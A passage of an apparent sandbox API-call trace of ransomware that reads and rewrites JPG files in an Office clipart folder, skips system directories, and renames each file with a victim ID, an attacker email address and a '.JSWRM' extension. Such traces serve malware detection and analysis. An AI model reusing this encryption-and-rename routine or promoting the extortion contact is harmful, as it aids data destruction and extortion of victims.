RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0089.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0089.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0089.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0089.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0089.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.874] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1aba5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382939.JPG", cAlternateFileName="")) returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2=".") returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="..") returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="...") returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="windows") returned -1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="recovery") returned -1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="perflogs") returned -1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="documents and settings") returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="system volume information") returned -1 [0089.874] lstrcmpiW (lpString1="J0382939.JPG", lpString2="msocache") returned -1 [0089.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382939.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382939.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382939.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382939.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382939.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382939.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.876] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=109477) returned 1 [0089.876] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1aba0) returned 0x24d210 [0089.877] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1aba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1aba0, lpOverlapped=0x0) returned 1 [0089.887] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.887] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1aba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1aba0, lpOverlapped=0x0) returned 1 [0089.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.889] CloseHandle (hObject=0x314) returned 1 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0089.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0089.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0089.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.890] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1653a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382942.JPG", cAlternateFileName="")) returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2=".") returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="..") returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="...") returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="windows") returned -1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="recovery") returned -1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="perflogs") returned -1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="documents and settings") returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="system volume information") returned -1 [0089.890] lstrcmpiW (lpString1="J0382942.JPG", lpString2="msocache") returned -1 [0089.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0089.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382942.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382942.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382942.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0089.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382942.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382942.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382942.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.893] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=91450) returned 1 [0089.893] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16530) returned 0x24d210 [0089.894] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x16530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x16530, lpOverlapped=0x0) returned 1 [0089.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.929] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x16530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x16530, lpOverlapped=0x0) returned 1 [0089.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.930] CloseHandle (hObject=0x314) returned 1 [0089.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0089.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0089.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0089.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0089.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.931] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.932] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf49f727, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf49f727, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e1d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382944.JPG", cAlternateFileName="")) returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2=".") returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="..") returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="...") returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="windows") returned -1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="recovery") returned -1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="perflogs") returned -1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="documents and settings") returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="system volume information") returned -1 [0089.932] lstrcmpiW (lpString1="J0382944.JPG", lpString2="msocache") returned -1 [0089.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0089.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382944.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382944.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382944.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0089.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0089.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382944.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382944.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382944.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0089.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.933] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=81437) returned 1 [0089.933] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13e10) returned 0x24d210 [0089.934] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x13e10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x13e10, lpOverlapped=0x0) returned 1 [0089.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.941] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x13e10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x13e10, lpOverlapped=0x0) returned 1 [0089.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.943] CloseHandle (hObject=0x314) returned 1 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0089.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | 